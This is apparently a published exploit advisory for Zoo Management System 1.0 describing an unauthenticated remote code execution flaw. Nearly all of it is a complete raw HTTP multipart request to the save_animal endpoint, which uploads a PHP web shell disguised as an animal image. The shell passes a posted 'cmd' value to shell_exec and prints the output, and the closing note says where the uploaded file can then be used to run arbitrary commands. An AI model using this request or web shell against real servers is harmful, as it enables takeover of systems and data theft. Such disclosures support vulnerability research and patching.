Zoo Management System 1.0 Shell Upload

`# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11  
  
## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.  
  
  
POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"  
  
kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"  
  
ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"  
  
1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"  
  
m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"  
  
3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"  
  
2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"  
  
2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"  
  
2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"  
  
faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"  
  
eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"  
  
5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"  
  
2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"  
  
3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream  
  
<?php  
if (!empty($_POST['cmd'])) {  
$cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="utf-8">  
<meta http-equiv="X-UA-Compatible" content="IE=edge">  
<meta name="viewport" content="width=device-width, initial-scale=1">  
<title>Web Shell</title>  
<style>  
* {  
-webkit-box-sizing: border-box;  
box-sizing: border-box;  
}  
  
body {  
font-family: sans-serif;  
color: rgba(0, 0, 0, .75);  
}  
  
main {  
margin: auto;  
max-width: 850px;  
}  
  
pre,  
input,  
button {  
padding: 10px;  
border-radius: 5px;  
background-color: #efefef;  
}  
  
label {  
display: block;  
}  
  
input {  
width: 100%;  
background-color: #efefef;  
border: 2px solid transparent;  
}  
  
input:focus {  
outline: none;  
background: transparent;  
border: 2px solid #e6e6e6;  
}  
  
button {  
border: none;  
cursor: pointer;  
margin-left: 5px;  
}  
  
button:hover {  
background-color: #e6e6e6;  
}  
  
.form-group {  
display: -webkit-box;  
display: -ms-flexbox;  
display: flex;  
padding: 15px 0;  
}  
</style>  
  
</head>  
  
<body>  
<main>  
<h1>Web Shell</h1>  
<h2>Execute a command</h2>  
  
<form method="post">  
<label for="cmd"><strong>Command</strong></label>  
<div class="form-group">  
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
<button type="submit">Execute</button>  
</div>  
</form>  
  
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
<h2>Output</h2>  
<?php if (isset($cmd)): ?>  
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
<?php else: ?>  
<pre><small>No result.</small></pre>  
<?php endif; ?>  
<?php endif; ?>  
</main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"  
  
  
------WebKitFormBoundary8NY8zT5dXIloiUML--  
  
  
  
  
## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.   
  
  
  
  
`